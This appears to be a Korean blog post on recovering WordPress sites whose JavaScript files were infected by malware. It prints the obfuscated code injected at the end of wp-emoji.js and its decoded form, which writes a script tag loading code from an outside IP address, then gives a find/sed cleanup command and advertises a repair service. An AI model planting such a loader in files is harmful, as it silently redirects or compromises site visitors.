워드프레스 보안 최적화 – 멀웨어 감염, 해킹 복구 작업 – 감염된 js 코드 삭제

최근들어 js 파일이 멀웨어(Malware) 악성코드 ( 멀웨어가 뭔지 모르는 분들은 일종의 컴퓨터 바이러스라고 생각하면 됩니다 ) 에 감염이 되어 워드프레스 사이트가 먹통이 되는 사례가 많이 발생하고 있습니다. 복구 과정간에 얼추 살펴보니 워드프레스 4.6~4.7.1 버전에 취약점이 있어서 감염이 되는 것 같습니다. 이 멀웨어의 감염증상은 모든 js 파일에 아래와 같은 코드를 집어 넣어 사이트가 제대로 작동 못하게 하거나 다른 사이트로 강제로 이동을 시키게 됩니다. 감염 여부를 알려면 ftp 로 접속을 해서 [wp-includes]->[js] 폴더의 wp-emoji.js 파일 맨아래에 아래 코드가 있는지를 확인하시면 되세요..

[wpsm_codebox style=”2″]var _0xaae8=[“”,”\x6A\x6F\x69\x6E”,”\x72\x65\x76\x65\x72\x73\x65″,”\x73\x70\x6C\x69\x74″,”\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C”,”\x77\x72\x69\x74\x65″];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0])) [/wpsm_codebox]

이 코드를 아래 사이트에서 디코드 ( 난독화해제 ) 해보면 다음과 같은 내용이 나옵니다.

 난독화해제사이트바로가기

[wpsm_codebox style=”2″]var _0xaae8=[“”,”join”,”reverse”,”split”,”>tpircs/<>”sj.yreuqj/87.611.942.431//:ptth”=crs tpircs<“,”write”];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))[/wpsm_codebox]

 

해킹된 사이트를 복구하는 방법은 두가지가 있습니다.

1. 리눅스 명령어를 이용해 모든 악성 코드 제거 : 다음과 같은 명령어를 웹루트폴더에서 실행시키면 모든 코드를 삭제할수 있습니다. 하지만 보통 공용웹호스팅에서는 find 나 xargs 를 사용하지 못하게 막아놓았기 때문에, 2번 방법을 이용하거나 다른 서버에 파일을 복사한뒤 복구를 하고 다시 복사를 하는 식으로 처리를 해야합니다.

[wpsm_codebox style=”2″]find . -type f \( -name "*.js" -o -name "*.json" \) -exec sh -c 'sed -i "s/var\s_0xaae8.*_0xaae8\[0\]))//" "$0"' {} \;[/wpsm_codebox]

2. 워드프레스 및 플러그인/테마 새로 설치  : 모든 파일을 다시 덮어쓰기를 하면 됩니다. 이 때 기존에 수정한 코드들이 있다면 꼭 다른 곳에 복사를 해놓은 뒤 파일들을 덮어쓰기하고, 다시 수정 코드를 붙여넣는 작업을 해주면 됩니다.

 

직접 복구가 어려우신 분들은 의뢰를 주시면  저렴한 비용에 복구를 해드리고 있으니 문의 주세요.  그리고 워드프레스는 계속해서 취약점이 발견되고 패치가 되기 때문에 보안 플러그인 설치, 스팸방지, 로그인설정, 백업관리 등의 보안최적화작업 및 지속적인 관리를 해야된다는 당부를 꼭 드리고 싶네요.

 

[wpsm_button color=”red” size=”medium” link=”https://smileboylab.com/%EC%84%9C%EB%B9%84%EC%8A%A4-%EC%8A%A4%ED%86%A0%EC%96%B4/” icon=”none” class=”” target=”_blank”]서비스의뢰하기[/wpsm_button]

Write a comment